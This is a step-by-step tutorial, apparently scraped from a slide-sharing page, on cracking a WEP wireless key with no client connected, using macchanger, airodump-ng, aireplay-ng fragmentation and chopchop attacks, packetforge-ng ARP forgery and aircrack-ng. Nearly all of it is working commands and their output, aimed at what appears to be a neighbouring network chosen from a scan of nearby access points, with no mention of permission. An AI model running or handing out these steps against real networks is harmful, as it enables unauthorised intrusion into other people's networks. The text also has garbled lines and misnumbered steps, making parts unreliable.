cracking wep without client
DESCRIPTION
kjcksacj jcd clinetTRANSCRIPT
-
1 - Set the wireless card MAC address 2 - Start the wireless interface in monitor mode 3 - Scan for WEP access points 4 - Pick out which WEP AP you want to attack, and associate airodump to that channel/bssid. 5 - Use aireplay-ng chopchop or fragmentation attack to obtain PRGA 6 - Use packetforge-ng to create a ARP packet 7 - Step Inject the ARP packetfrom step #6 Final Step Crack the WEP key
Step 1: Set up the wireless card MAC Address
This isn't really necessary however the command to do so is machange -r mon0Keep in mind this applies to the card that I have, your interface may be different.-r (random). By using this flag the mac address generated will be random.
root@bt:~# macchanger -r wlan0Current MAC: 00:c0:ca:33:7f:72 (Alfa, Inc.)Faked MAC: 36:b1:e6:05:32:da (unknown)
Step 2: Start the wireless interface in monitor mode
airmong-ng start wlan0
note once again wlan0 is my interface. Feel free to check for yours with the iwconfig command.
You should see the following
root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wlan0 RTL8187 rtl8187 - [phy0] (monitor mode enabled on mon1)mon0 RTL8187 rtl8187 - [phy0]
If you see the monitor mode enabled you know your then good to go.
Step 3. Scan for WEP access points
airodump-ng mon0
You should see something like this.
-
CH 7 ][ Elapsed: 16 s ][ 2010-09-01 00:39
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:24:A5:AD:79:59 -13 26 0 0 6 54e. WPA2 CCMP PSK PwnSauce 00:1C:10:A1:C1:32 -61 3 0 0 11 54 WEP WEP dusty 00:1B:5B:B3:B5:71 -63 4 2 0 8 54 . WEP WEP 2WIRE486 00:18:39:B1:4D:DD -64 14 0 0 1 54 WPA2 CCMP PSK rocky4191980net 00:19:E4:48:97:A9 -63 11 0 0 1 54 . WEP WEP 2WIRE040 00:18:39:62:34:EE -63 19 0 0 6 54 OPN linksys 00:25:3C:F1:C9:E9 -66 5 0 0 11 54 . WEP WEP 2WIRE266 00:1A:70:00:77:E4 -64 13 0 0 6 54 OPN Moyers 00:18:3F:2B:A2:01 -67 7 0 0 1 54 . WEP WEP 2WIRE305 00:26:50:D0:4D:C9 -69 2 0 0 6 54 . WEP WEP 2WIRE705 00:0F:66:D2:6E:F4 -70 5 0 0 6 54 . WPA TKIP PSK HFNET 00:1D:7E:97:C0:1D -71 4 0 0 1 54e WPA2 CCMP PSK RRlinksys 00:1E:E5:EB:63:6C -69 5 0 0 6 54e. WPA2 CCMP PSK jake wireless 00:23:51:3B:89:D1 -71 3 0 0 3 54 . WEP WEP 2WIRE629 00:24:B2:51:C6:CA -71 3 0 0 1 54e. WPA2 CCMP PSK Pepp-Main-Office2.4Ghz
Step 4. Pick out which WEP AP you want to attack, and associate airodump to that channel/bssid. In this case I have decided on 2WIRE040.
Airodump-ng -c 1 bssid 00:19:E4:48:97:A9 -w wepcrack mon0
Step 6. Use aireplay-ng to do a fake authentication with the WAP.
Aireplay-ng -1 0 -e 2WIRE040 -a 00:19:E4:48:97:A9 -h 36:b1:e6:05:32:da mon0
-1 mean fake authentication attack0 is how often it will time out in seconds-e is the ssid name in this case 2WIRE040-a is the Access Points MAC-h is your mac address in this case 36:b1:e6:05:32:da-w is the file name in this case wepcrackmon0 is the wireless interface name
you should see something similar to this.
00:47:56 Waiting for beacon frame (BSSID: 00:19:E4:48:97:A9) on channel 1
00:47:56 Sending Authentication Request (Open System) [ACK]00:47:56 Authentication successful00:47:56 Sending Association Request [ACK]
-
00:48:01 Sending Authentication Request (Open System) [ACK]00:48:01 Authentication successful00:48:01 Sending Association Request [ACK]00:48:01 Association successful :-) (AID: 1)
Step 5. Use aireplay-ng chopchop or fragmentation attack to obtain PRGA
Let's use the fragmentation attack first.
Aireplay -5 -b 00:19:E4:48:97:A9 -h 36:b1:e6:05:32:da mon0
-5 is the fragmentation attack-b is the WAP MAC address in this case 00:19:E4:48:97:A9-h is your MAC address in this case 36:b1:e6:05:32:da
you should see this
00:51:26 Waiting for beacon frame (BSSID: 00:19:E4:48:97:A9) on channel 100:51:26 Waiting for a data packet...Read 114 packets...
Size: 68, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:19:E4:48:97:A9 Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:19:E4:48:97:A9
0x0000: 0842 0000 ffff ffff ffff 0019 e448 97a9 .B...........H.. 0x0010: 0019 e448 97a9 2055 df6b 2c00 2d25 81d7 ...H.. U.k,.-%.. 0x0020: c27e 6181 7323 1df2 b8ba 990f 2470 b5c5 .~a.s#......$p.. 0x0030: e377 3200 045a 849c 835f a199 3763 6ad6 .w2..Z..._..7cj. 0x0040: c366 64cc .fd.
Use this packet ? Y
Saving chosen packet in replay_src-0901-005130.cap00:51:40 Data packet found!00:51:40 Sending fragmented packet00:51:40 Not enough acks, repeating...00:51:40 Sending fragmented packet00:51:42 No answer, repeating...00:51:42 Trying a LLC NULL packet00:51:42 Sending fragmented packet00:51:42 Got RELAYED packet!!00:51:42 Trying to get 384 bytes of a keystream00:51:42 Got RELAYED packet!!00:51:42 Trying to get 1500 bytes of a keystream00:51:42 Got RELAYED packet!!Saving keystream in fragment-0901-005142.xor
-
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
Was the previous step failboat? If so you might want to use a chopchop attack seen below
aireplay-ng -4 -h 36:b1:e6:05:32 -b 00:19:E4:48:97:A9 mon0
-4 mean the chopchop attack-h is our hosts mac address in this case 36:b1:e6:05:32-b is our WAP mac address in this case 00:19:E4:48:97:A9 mon0 is the wireless interface
You should see something similar
.01:54:33 Waiting for beacon frame (BSSID: 00:19:E4:48:97:A9) on channel 1
Size: 68, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:19:E4:48:97:A9 Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:19:E4:48:97:A9
0x0000: 0842 0000 ffff ffff ffff 0019 e448 97a9 .B...........H.. 0x0010: 0019 e448 97a9 0094 e74d 9c00 37d2 4c5b ...H.....M..7.L[ 0x0020: 3410 24dd 7b04 bdc5 fc13 ada3 339d a06f 4.$.{.......3..o 0x0030: d1e2 0825 ecc8 539e c1c5 321f 55c3 58f1 ...%..S...2.U.X. 0x0040: 1ca8 e016 ....
Use this packet ? y
Saving chosen packet in replay_src-0901-015434.cap
Offset 67 ( 0% done) | xor = 08 | pt = 1E | 168 frames written in 2862msOffset 66 ( 2% done) | xor = 61 | pt = 81 | 426 frames written in 7247msOffset 65 ( 5% done) | xor = 2C | pt = 84 | 32 frames written in 536msOffset 64 ( 8% done) | xor = 0A | pt = 16 | 684 frames written in 11637msOffset 63 (11% done) | xor = 9A | pt = 6B | 326 frames written in 5539msOffset 62 (14% done) | xor = 59 | pt = 01 | 182 frames written in 3100msOffset 61 (17% done) | xor = 6B | pt = A8 | 39 frames written in 664msOffset 60 (20% done) | xor = 95 | pt = C0 | 654 frames written in 11111msOffset 59 (23% done) | xor = E0 | pt = FF | 14 frames written in 230msOffset 58 (26% done) | xor = CD | pt = FF | 753 frames written in 12813msOffset 57 (29% done) | xor = 3A | pt = FF | 669 frames written in 11369msOffset 56 (32% done) | xor = 3E | pt = FF | 19 frames written in 320msOffset 55 (35% done) | xor = 61 | pt = FF | 276 frames written in 4701msOffset 54 (38% done) | xor = AC | pt = FF | 1960 frames written in 33312msOffset 53 (41% done) | xor = 36 | pt = FE | 1100 frames written in 18705msOffset 52 (44% done) | xor = ED | pt = 01 | 91 frames written in 1546ms
-
Offset 51 (47% done) | xor = 8D | pt = A8 | 144 frames written in 2443msOffset 50 (50% done) | xor = C8 | pt = C0 | 42 frames written in 714msOffset 49 (52% done) | xor = 4B | pt = A9 | 173 frames written in 2941msOffset 48 (55% done) | xor = 46 | pt = 97 | 2360 frames written in 40130msOffset 47 (58% done) | xor = 27 | pt = 48 | 320 frames written in 5435msOffset 46 (61% done) | xor = 44 | pt = E4 | 1281 frames written in 21766msOffset 45 (64% done) | xor = 84 | pt = 19 | 1650 frames written in 28064msOffset 44 (67% done) | xor = 33 | pt = 00 | 241 frames written in 4091msOffset 43 (70% done) | xor = A2 | pt = 01 | 193 frames written in 3289msOffset 42 (73% done) | xor = AD | pt = 00 | 613 frames written in 10407msOffset 41 (76% done) | xor = 17 | pt = 04 | 163 frames written in 2776msOffset 40 (79% done) | xor = FA | pt = 06 | 1353 frames written in 23009msOffset 39 (82% done) | xor = C5 | pt = 00 | 136 frames written in 2305msOffset 38 (85% done) | xor = B5 | pt = 08 | 2027 frames written in 34467msOffset 37 (88% done) | xor = 05 | pt = 01 | 488 frames written in 8295msOffset 36 (91% done) | xor = 7B | pt = 00 | 18 frames written in 303msOffset 35 (94% done) | xor = DB | pt = 06 | 229 frames written in 3890msOffset 34 (97% done) | xor = 2C | pt = 08 | 404 frames written in 6871ms
Saving plaintext in replay_dec-0901-015714.capSaving keystream in replay_dec-0901-015714.xor
Completed in 152s (0.20 bytes/s)
Success ^ :)
Step 6. Use packetforge-ng to create a ARP packet
packetforge-ng -0 -a 00:19:E4:48:97:A9 -h 36:b1:e6:05:32:da -k 255.255.255.255 -l 255.255.255.255 -y fragment-0901-005142.xor -w wepcrack
-0 means create a ARP packet-a is the WAP MAC in this case 00:19:E4:48:97:A9-h is your MAC address in this case 36:b1:e6:05:32:da-k is the destination IP (most AP's will work find with this setting)-l is the source ip (again most AP's will respond fine with this)-y fragment-0901-006142.xor is the file you get your PRGA from-w is the name of the file you wish to call it in this case wepcrack
Success will look like this
Wrote packet to: wepcrack
Step 7. Inject the ARP packet
aireplay-ng -2 -r wepcrack mon0
-
-2 means interative mode-r is the file of which to read the arp packet in this case wepcrack
you should see something similar
No source MAC (-h) specified. Using the device MAC (00:C0:CA:33:7F:72)
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:19:E4:48:97:A9 Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:C0:CA:33:7F:72
0x0000: 0841 0201 0019 e448 97a9 00c0 ca33 7f72 .A.....H.....3r 0x0010: ffff ffff ffff 8001 df6e f700 79d3 cc92 .........n..y... 0x0020: f911 0d44 a461 c287 e878 caf7 61ea edbc ...D.a...x..a... 0x0030: a2cc 2b96 c8fa 1097 cb73 75ac cfd6 f8c6 ..+......su..... 0x0040: eea8 f908 ....
Use this packet ? y
Now we wait for about 40,000 IV's. If you take a look at your airodump window you will see the data start to sky rocket. When this reaches 40,000 hit ctrl+C to kill the process.
Succes :)
CH 1 ][ Elapsed: 27 mins ][ 2010-09-01 01:19
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:E4:48:97:A9 -67 33 8396 43869 41 1 54 . WEP WEP 2WIRE040
Final Step: Crack the WEP key
aircrack-ng -b 00:19:E4:48:97:A9 crackwep*.cap
-b is the WAP MAC address in this case 00:19:E4:48:97:A9
After a few seconds you will get the key
Aircrack-ng 1.0 r1645
[00:00:00] Tested 74 keys (got 43384 IVs)
-
KB depth byte(vote) 0 0/ 2 82(57088) CE(52224) 09(51968) F1(51712) 8A(51200) 3E(50944) 52(50432) 4E(50176) 4F(50176) 93(50176) 35(49920) EE(49920) 13(48896) 14(48896) 1 1/ 3 90(52736) F9(52224) 2E(51200) D5(50944) BA(50688) B9(50432) 51(49920) C1(49920) 48(49664) 35(49408) 12(49152) 9B(49152) F4(48896) 9D(48640) 2 0/ 1 73(60416) 49(54016) 79(52480) 11(52224) 22(52224) 7B(51712) EF(50944) 16(50432) 58(50432) 82(50432) D4(50432) 72(49664) 3A(49408) BA(49152) 3 0/ 6 08(56320) A8(54784) 1C(52992) B3(52736) 10(52224) 8D(51968) D8(50944) 82(50688) 10(50176) 0E(49920) CB(49920) F7(49408) 5F(49152) DA(49152) 4 0/ 3 80(55808) 00(52480) 0B(51456) FC(50944) 95(50432) B7(50432) AE(49920) C0(49408) E4(49152) 24(48896) 6D(48896) 82(48896) 7F(48640) D4(48640)
KEY FOUND! [ 82:77:73:08:80 ] Decrypted correctly: 100%
I hope you enjoyed my tutorial.
Securityxxxpert
Note I will be making a video as well to attach with when time permits.
Step 1: Set up the wireless card MAC AddressStep 3. Scan for WEP access pointsStep 4. Pick out which WEP AP you want to attack, and associate airodump to that channel/bssid. In this case I have decided on 2WIRE040.Step 6. Use packetforge-ng to create a ARP packetStep 7. Inject the ARP packetFinal Step: Crack the WEP key